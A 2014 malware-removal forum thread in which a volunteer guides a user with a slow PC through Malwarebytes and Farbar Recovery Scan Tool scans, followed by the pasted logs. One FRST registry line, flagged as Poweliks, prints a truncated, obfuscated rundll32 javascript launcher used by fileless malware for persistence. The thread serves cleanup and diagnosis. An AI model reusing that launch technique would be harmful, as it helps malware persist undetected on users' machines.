Can somebody help me clean out multiple dllhost.exe

bmclain · October 27, 2014

Keeps slowing my computer to halt, don't know what to do. Any help appreciated.

Naathim · October 27, 2014

Minion%20Welcome.jpg

My name's Naathim and I'm a GeekU Minion! Now that we are mates and will be working together to clean your machine out of any junkware, feel free to call me Naat

Before we start please note the following:

Analysis and research take some time, also sometimes real life gets in the way, please be patient.
Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
Paste the logs in your posts, attachments make my work harder and more complicated.
Stay with me to the end, the absence of symtoms doesn't mean that your machine is fully operational.
Note that we may live in totally different time zones, what may cause some delays between answers.

I can't foresee everything, so if anything unexpected happens, please stop and inform me!

There are no silly questions. Never be afraid to ask if in doubt!

Let's start and enjoy the fight!

Rules and policies

We won't support any piracy.

That being told, if any evidence of illegal OS, software, cracks/keygens or any other will be revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!

The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result with closing your topic and withdrawning any assistance.

51a46ae42d560-malwarebytes_anti_malware. Scan with Malwarebytes' Anti-Malware

Please download and install Malwarebytes Anti-Malware, or re-run it if you already have it installed.

First of all select update.
Once updated, click the Settings tab, in the left panel choose Detctions & protection and tick Scan for rootkits.
Click the Scan tab, choose Threat Scan is checked and click Scan Now.
If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
Upon completion of the scan (or after the reboot), click the History tab.
Click Application Logs and double-click the Scan Log.
At the bottom click Export and choose Text file.

Save the file to your desktop and include its content in your next reply.

Scan with Farbar Recovery Scan Tool

Please download Farbar Recovery Scan Tool and save it to your Desktop.

There will be two versions to download: 32-bit and 64-bit. Please download the one that is designed for your system. If you don't know which one should it be, download both of them and try each other out. Only one will run - this is the right one. Please leave it and delete the other.

Right-click on icon and select Run as Administrator to start the tool.
> XP users click run after receipt of Windows Security Warning - Open File.
> 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
When the tool opens click Yes to disclaimer.
Make sure that Addition option is checked.
Press Scan button and wait.
The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.

bmclain · October 27, 2014

Thank you for taking the time to help me, this has been driving me crazy!

Here are the logs:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/27/2014
Scan Time: 1:51:34 AM
Logfile: Malwarebytes scan.txt
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.10.27.01
Rootkit Database: v2014.10.22.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: McLain

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 361369
Time Elapsed: 11 min, 32 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 27-10-2014
Ran by McLain (administrator) on MCLAIN-PC on 27-10-2014 02:05:38
Running from C:\Users\McLain\Desktop
Loaded Profile: McLain (Available profiles: McLain)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\audiodg.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKU\S-1-5-21-1721771813-3942891954-2793525010-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\Users\LogMeInRemoteUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Best Buy pc app.lnk
ShortcutTarget: Best Buy pc app.lnk -> C:\ProgramData\Best Buy pc app\ClickOnceSetup.exe (No File)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
DPF: HKLM {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://qtinstall.apple.com/qtactivex/qtplugin.cab
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101
FF NewTab: www.google.com
FF Homepage: www.google.com
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_189.dll ()
FF Plugin: @bestbuy.com/npBestBuyPcAppDetector,version=1.0 -> C:\ProgramData\Best Buy pc app\npBestBuyPcAppDetector.dll No File
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin-x32: @bestbuy.com/npBestBuyPcAppDetector,version=1.0 -> C:\ProgramData\Best Buy pc app\npBestBuyPcAppDetector.dll No File
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: Custom New Tab - C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\Extensions\CNT@ednovak.net.xpi [2013-07-18]
FF Extension: Magic Actions for YouTube™ - C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\Extensions\jid0-UVAeBCfd34Kk5usS8A1CBiobvM8@jetpack.xpi [2014-09-15]
FF Extension: NoScript - C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2014-10-27]
FF Extension: Adblock Plus - C:\Users\McLain\AppData\Roaming\Mozilla\Firefox\Profiles\iaxa0uvq.default-1353978850101\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-10-27]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-10-23]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-27]
CHR Extension: (Google Drive) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-10-27]
CHR Extension: (YouTube) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-27]
CHR Extension: (Google Search) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-27]
CHR Extension: (Foxtab Speed Dial (Beta)) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\kcendgajlhoaiiccpijilcpmgphfflnj [2014-10-27]
CHR Extension: (Google Wallet) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-27]
CHR Extension: (Gmail) - C:\Users\McLain\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-27]
CHR HKLM\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\Users\McLain\AppData\Local\newhb.crx [2013-08-01]
CHR HKCU\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\Users\McLain\AppData\Local\newhb.crx [2013-08-01]
CHR HKLM-x32\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\Users\McLain\AppData\Local\newhb.crx [2013-08-01]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ASUSWireless; C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe [184320 2012-03-21] () [File not signed]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
S4 jswpsapi; C:\Program Files (x86)\NETGEAR\WN111v2\jswpsapi.exe [942080 2008-02-29] (Atheros Communications, Inc.) [File not signed]
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]
S4 RalinkRegistryWriter; C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\RaRegistry.exe [375872 2012-03-21] (Ralink Technology, Corp.)
S4 RealtekSE; C:\Program Files (x86)\ASUS\PCE-N10 WLAN Card Utilities\RtlService.exe [36864 2011-06-23] (Realtek) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2009-08-03] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [13368 2009-07-05] ()
S2 DgiVecp; C:\Windows\system32\Drivers\DgiVecp.sys [53816 2009-02-10] (Samsung Electronics Co., Ltd.)
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [14456 2013-05-16] (GFI Software)
S3 Leapfrog-USBLAN; C:\Windows\System32\DRIVERS\btblan.sys [40320 2011-11-12] (Belcarra Technologies) [File not signed]
R3 MTsensor; C:\Windows\system32\DRIVERS\ASACPI.sys [15416 2009-07-15] ()
S3 PCAMp50a64; C:\Windows\System32\Drivers\PCAMp50a64.sys [43328 2006-11-28] (Printing Communications Assoc., Inc. (PCAUSA))
S3 PCASp50a64; C:\Windows\System32\Drivers\PCASp50a64.sys [41280 2006-11-28] (Printing Communications Assoc., Inc. (PCAUSA))
S3 Serial; C:\Windows\system32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R2 SSPORT; C:\Windows\SysWOW64\Drivers\SSPORT.sys [11576 2009-02-06] (Samsung Electronics)
S3 WN111v2; C:\Windows\System32\DRIVERS\WN111v2w7x.sys [767488 2009-10-21] (Atheros Communications, Inc.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-27 02:05 - 2014-10-27 02:05 - 00011128 _____ () C:\Users\McLain\Desktop\FRST.txt
2014-10-27 02:04 - 2014-10-27 02:04 - 02113024 _____ (Farbar) C:\Users\McLain\Desktop\FRST64.exe
2014-10-27 02:04 - 2014-10-27 02:04 - 00001071 _____ () C:\Users\McLain\Desktop\Malwarebytes scan.txt
2014-10-27 01:50 - 2014-10-27 01:50 - 00000056 _____ () C:\Windows\setupact.log
2014-10-27 01:50 - 2014-10-27 01:50 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-27 00:33 - 2014-10-27 02:05 - 00000000 ____D () C:\FRST
2014-10-26 22:39 - 2014-10-26 22:39 - 00000000 ____D () C:\ProgramData\CheckPoint
2014-10-25 10:22 - 2014-10-26 17:40 - 00000000 ____D () C:\Windows\Minidump
2014-10-25 01:53 - 2014-10-25 01:53 - 00000000 ____D () C:\ProgramData\Licenses
2014-10-25 01:47 - 2014-10-25 01:47 - 01700352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdiplus.dll
2014-10-25 01:47 - 2014-10-25 01:47 - 01060864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc71.dll
2014-10-25 01:45 - 2014-10-27 00:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Comodo
2014-10-25 01:45 - 2014-10-26 14:11 - 00000000 ____D () C:\Program Files\COMODO
2014-10-25 01:45 - 2014-10-25 01:47 - 00000000 ____D () C:\Program Files (x86)\Comodo
2014-10-25 01:42 - 2014-10-26 14:11 - 00000000 ____D () C:\ProgramData\Comodo
2014-10-25 01:11 - 2014-10-25 01:11 - 00020550 _____ () C:\ComboFix.txt
2014-10-25 00:24 - 2014-10-25 00:24 - 00000000 ____D () C:\Windows\ERUNT
2014-10-24 04:06 - 2014-09-18 18:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-24 03:48 - 2014-08-28 19:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2014-10-24 03:48 - 2014-05-08 02:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2014-10-24 03:42 - 2014-09-04 19:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-24 03:42 - 2014-09-04 18:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-24 00:06 - 2013-10-01 19:22 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys
2014-10-24 00:06 - 2013-10-01 19:11 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2014-10-24 00:06 - 2013-10-01 19:08 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2014-10-24 00:06 - 2013-10-01 18:48 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\MsRdpWebAccess.dll
2014-10-24 00:06 - 2013-10-01 18:48 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2014-10-24 00:06 - 2013-10-01 18:29 - 00062976 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2014-10-24 00:06 - 2013-10-01 18:10 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2014-10-24 00:06 - 2013-10-01 17:15 - 01057280 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2014-10-24 00:06 - 2013-10-01 17:14 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsRdpWebAccess.dll
2014-10-24 00:06 - 2013-10-01 17:14 - 00017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2014-10-24 00:06 - 2013-10-01 17:08 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2014-10-24 00:06 - 2013-10-01 17:01 - 00420864 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2014-10-24 00:06 - 2013-10-01 16:58 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2014-10-24 00:06 - 2013-10-01 16:31 - 01147392 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-24 00:06 - 2013-10-01 16:08 - 00855552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2014-10-24 00:06 - 2013-10-01 15:34 - 01068544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-24 00:03 - 2014-10-24 00:03 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-24 00:03 - 2014-10-24 00:03 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-24 00:03 - 2014-10-24 00:03 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-24 00:03 - 2014-10-24 00:03 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00774144 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00645120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsIntl.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00616104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dat
2014-10-24 00:03 - 2014-10-24 00:03 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat
2014-10-24 00:03 - 2014-10-24 00:03 - 00610304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00413696 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-24 00:03 - 2014-10-24 00:03 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2014-10-24 00:03 - 2014-10-24 00:03 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00247808 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00233472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00208384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00194048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\elshyph.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00182272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msls31.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00167424 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00151552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iexpress.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00147968 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00139264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00131072 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00127488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00111616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IEAdvpack.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00105984 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00101376 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00086016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-10-24 00:03 - 2014-10-24 00:03 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2014-10-24 00:03 - 2014-10-24 00:03 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll
